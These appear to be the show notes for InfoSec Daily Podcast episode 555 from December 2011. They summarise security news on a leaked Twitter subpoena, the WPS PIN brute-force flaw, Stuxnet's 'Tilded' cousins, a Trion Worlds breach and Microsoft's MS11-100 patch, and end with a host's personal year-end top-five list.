<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://mashable.com/2011/12/28/leaked-twitter-subpoena-raises-online-privacy-issues/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2011/12/28/leaked-twitter-subpoena-raises-online-privacy-issues/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The leaked subpoena sent to Twitter this month by the Suffolk District Attorney&#39;s Office in Boston is causing some hoopla on the web and raising the issue of law enforcement&#39;s access to online personal data. On Dec. 14, the D.A.&#39;s Office issued a subpoena to Twitter in order to access the account information of two users who tweeted a list of personal information they allegedly obtained by hacking into the Boston Police Patrolmens&#39; Association. The hackers stole identifying information and Tweeted it to followers. The subpoena requests &quot;available subscriber information, for the account or accounts associated with the following information, including IP address logs for account creation.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the subpoena, assistant D.A. Benjamin A. Goldberger requests that the investigation be kept from the Twitter users as to not impede the ongoing probe. But the information was leaked. We reached out to Twitter for comment, but have yet to hear back.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Dec. 23 one of the accounts under investigation, @p0isAn0N Tweeted, &quot;Haha. Boston PD submitted to Twitter for my information. Lololol? For what? Posting info pulled from public domains? #comeatmebro.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The D.A.&#39;s office requested details of two Twitter users and also listed the name Guido Fawkes, which is the name but not handle listed for one of the accounts under investigation, as well as the hashtags #BostonPD and #d0xcak3.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the accounts being probed is listed in the subpoena as @OccupyBoston, however that account appears to be inactive. It&#39;s likely they meant @Occupy_Boston, which Tweets about the occupy movement. Targeting this account has lead some to speculate that the police are monitoring the online activity of occupy protestors.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter&#39;s website contains an information section for law enforcement. It states that if a subpoena is issued for a user&#39;s information, the company will inform that user before they hand the information to the authorities, unless it is prevented from doing so by court order or statute. According to its site, Twitter was following protocol by informing the user of the subpoena, and, perhaps later providing that user&#39;s information to the Boston D.A. This isn&#39;t the first time Twitter has been reluctant to hand-over user information to law enforcement.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.zdnet.com/blog/networking/wi-fi-protected-setup-is-busted/1808"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/networking/wi-fi-protected-setup-is-busted/1808</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://seclists.org/fulldisclosure/2011/Dec/484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://seclists.org/fulldisclosure/2011/Dec/484</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard for easy establishment of a wireless home network.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Created by the Wi-Fi Alliance and officially launched on January 8, 2007, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up the encryption method WPA, as well as making it easy to add new devices to an existing network without entering long passphrases. &nbsp;The U.S. </span><a href="http://www.cert.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Computer Emergency Readiness Team (CERT)</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has confirmed that security researcher Stefan Viehb&ouml;ck has found a security hole big enough to drive a network through WPS.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Viehb&ouml;ck, he took a look at </span><a href="http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">WPS and found &ldquo;a few really bad design decisions which enable an efficient brute force attack</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, thus effectively breaking the security of pretty much all WPS-enabled Wi-Fi routers. As all of the more recent router models come with WPS enabled by default, this affects millions of devices worldwide.&rdquo; CERT agrees.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How bad is it? CERT states that &ldquo;An attacker within range of the wireless access point may be able to brute force the WPS PIN and retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The problem is, as </span><a href="http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Viehb&ouml;ck explains in detail</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (PDF Link) is that when the device&rsquo;s personal identification number (PIN), which is usually implemented as a simple physical or virtual push-button, authentication fails the access point will send an Extensible Authentication Protocol-Negative Acknowledgement (EAP-NACK ), which are sent in away that lets a hacker know if the first half of the PIN is right. Then, armed with that information, the attacker will be able to figure out the PIN&rsquo;s last digit of the PIN is known since it&rsquo;s is a checksum number for the entire PIN. What all that means is that it becomes much easier to work out a PIN. To be exact, with the worse luck in the world it would take a cracker 11.000 attempts to break the code.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://tech2.in.com/news/social-networking/researchers-prove-that-stuxnet-weapon-has-at-least-4-cousins/268302"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tech2.in.com/news/social-networking/researchers-prove-that-stuxnet-weapon-has-at-least-4-cousins/268302</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Stuxnet virus that last year damaged Iran&#39;s nuclear program was likely one of at least five cyber weapons developed on a single platform whose roots trace back to 2007, according to new research from Russian computer security firm Kaspersky Lab.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security experts widely believe that the United States and Israel were behind Stuxnet, though the two nations have officially declined to comment on the matter.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Pentagon spokesman on Wednesday declined comment on Kaspersky&#39;s research, which did not address who was behind Stuxnet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stuxnet has already been linked to another virus, the Duqu data-stealing trojan, but Kaspersky&#39;s research suggests the cyber weapons program that targeted Iran may be far more sophisticated than previously known.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky&#39;s director of global research &amp; analysis, Costin Raiu, told Reuters on Wednesday that his team has gathered evidence that shows the same platform that was used to build Stuxnet and Duqu was also used to create at least three other pieces of malware.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Raiu said the platform is comprised of a group of compatible software modules designed to fit together, each with different functions. Its developers can build new cyber weapons by simply adding and removing modules.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It&#39;s like a Lego set. You can assemble the components into anything: a robot or a house or a tank,&quot; he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky named the platform &quot;Tilded&quot; because many of the files in Duqu and Stuxnet have names beginning with the tilde symbol &quot;~&quot; and the letter &quot;d.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers with Kaspersky have not found any new types of malware built on the Tilded platform, Raiu said, but they are fairly certain that they exist because shared components of Stuxnet and Duqu appear to be searching for their kin.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When a machine becomes infected with Duqu or Stuxnet, the shared components on the platform search for two unique registry keys on the PC linked to Duqu and Stuxnet that are then used to load the main piece of malware onto the computer, he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky recently discovered new shared components that search for at least three other unique registry keys, which suggests that the developers of Stuxnet and Duqu also built at least three other pieces of malware using the same platform, he added.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.trionworlds.com/en/games/account-notification"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.trionworlds.com/en/games/account-notification</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://pc.gamespy.com/pc/heroes-of-telara/1215450p1.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pc.gamespy.com/pc/heroes-of-telara/1215450p1.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IMPORTANT NOTIFICATION CONCERNING YOUR TRION WORLDS ACCOUNT</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We recently discovered that unauthorized intruders gained access to a Trion Worlds account database.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The database in question contained information including user names, encrypted passwords, dates of birth, email addresses, billing addresses, and the first and last four digits and expiration dates of customer credit cards.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is no evidence, and we have no reason to believe, that full credit card information was accessed or compromised in any way. We have already taken further action to strengthen our systems, even as we, with external security experts, continue to research the extent of the unauthorized access.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You will notice on your next log in to our website that you will be required to change your password, and existing Mobile Authenticator users will also need to reconnect their Authenticator. When you log in, you will be prompted to provide a new password, security questions and answers, and be given the option to connect your account to our Mobile Authenticator to enhance your account&rsquo;s security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you have used your username and password for other accounts, especially financial accounts or accounts with personal information, we suggest you change your passwords on those accounts as well. We recommend that you carefully review your statements, account activity, and credit reports to help protect the security of those accounts. If you need information on how to obtain your credit report or believe any such accounts have been breached, please </span><a href="http://www.trionworlds.com/en/games/account-notification.php#additionalinformation"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">see below</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for more information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You should have continued, uninterrupted access to RIFT, and we do not anticipate any disruptions to your playing time.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nevertheless, if you own the RIFT game, you will be granted three (3) days of complimentary RIFT game time once you update your password and security questions.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Additionally, once you update your account and set a new password, your account will be granted a Moneybags&rsquo; Purse, which increases your looted coin by 10%, even if you have not yet purchased RIFT.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please log in to </span><a href="https://rift.trionworlds.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://rift.trionworlds.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (and we recommend that you copy and paste this link into your browser to access the site) to update your password, security questions and Authenticator.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We apologize for any inconvenience this may have caused you. If you have further questions, please visit our website,</span><a href="http://www.trionworlds.com/en/games/account-notification-faq.php"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.trionworlds.com/AccountNotificationFAQ</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ADDITIONAL INFORMATION</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To protect against possible identity theft or other financial loss, we encourage you to remain vigilant, to review your account statements and to monitor your credit reports. Provided below are the names and contact information for the three major U.S. credit bureaus and additional information about steps you may take to obtain a free credit report and/or place a security freeze on your credit report. If you believe those accounts may have been breached or that your identity may have been stolen, you should contact law enforcement, including the Federal Trade Commission. If you believe you are the victim of identity theft, you also have right to file a police report and obtain a copy of it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://blogs.technet.com/b/msrc/archive/2011/12/29/microsoft-releases-ms11-100-for-security-advisory-2659883.aspx?Redirected=true"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://blogs.technet.com/b/msrc/archive/2011/12/29/microsoft-releases-ms11-100-for-security-advisory-2659883.aspx?Redirected=true</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today we released Security Update</span><a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-100"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">MS11-100</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to address the issue described in</span><a href="http://technet.microsoft.com/en-us/security/advisory/2659883"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Security Advisory 2659883</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security update has a severity rating of Critical and resolves a publicly disclosed remote unauthenticated Denial of Service issue in ASP.NET versions 1.1 and above on all supported versions of .NET Framework. Of note, the new method of hash collision attacks used to exploit this vulnerability is an industry-wide issue affecting various Web platforms, including ASP.NET.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While we have seen no attacks attempting to exploit this vulnerability, we encourage affected customers to test and deploy the update as soon as possible. Consumers are not vulnerable unless they are running a Web server from their computer. More technical details can be found at the Security Research &amp; Defense Blog.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Karthik&rsquo;s Top 5:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Driving Cross Country</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> While this isn&rsquo;t security related at all, it should still figure in the Top 5 for the year. Moving from California to North Carolina, especially with a damaged door, was a great experience. It was a very very long drive, but I guess it was kinda worth it because now I spend ~10 hours lesser in flights, every trip&#8230;unless I travel to the west.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Rejoining ISD Podcast</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I wasn&rsquo;t a regular crew member on the podcast for a while, thanks to Georgia Tech, and then my visit to India. Not being on the podcast felt weird, and felt like I wasn&rsquo;t doing something right. Getting back to it in January once I started my job in California felt good, and I&rsquo;ve been on ever since. Its been a great experience recording in the absence of Rick (or sometimes in his presence, as well), and as always, I learn new things everyday</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> 3. Being a Security Consultant</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> As I am sure Rick will agree, being a security consultant has a few perks (and quite a few downsides too). It gave me a lot of exposure into work that I&rsquo;d never done before, gave me a lot of airline miles, and more importantly, taught me a whole lot about penetration testing, and what goes behind it. Before taking up the job, it was what I had studied in books, or read in articles, but doing the job itself was very rewarding</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Live Podcasts</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&rsquo;ve done live podcasts before, where people at a particular conference join us and talk aout what&rsquo;s happening there. That changed a little this year, where we were at security conferences and did live podcasts from there. It was easily one of the biggest highlights of the year, and gave a new dimension to the podcasts. I still remember the introduction show at Defcon, the snoring show at Derbycon, and the more recent ISD/EL crossover at BSides ATL.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. Speaking at Derbycon</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I guess this is one thing I have in common with both Boris&rsquo; and Rick&rsquo;s lists. I would have said Geordy&rsquo;s, but he wasn&rsquo;t there, so I doubt it will appear. Speaking at Derbycon was a huge learning experience, not just in terms of speaking in front of a very well informed crowd, but also in terms of writing most of the tool in Panera Bread two hours before the talk. While it wasn&rsquo;t my first talk at a security conference (there was that quick fire talk at ShoeCon, and a talk attended by 7 people at BSides ATL 2010), it was definitely something I will remember for a long time, and maybe a few years later when DerbyCon becomes as big as Schmoocon, I will point at my speaker badge and say &ldquo;Yeah, I spoke there in the first ever edition.&rdquo;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-555-subpoena-leak-dont-fear-the-reaver-stuxnet-cousins-trion-ms11-100-karthiks-top-5/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3313/0/infosec-daily-podcast-episode-555.mp3" length="21048360" type="audio/mpeg" />
		<itunes:duration>0:43:48</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 555 for December 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 555 for December 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
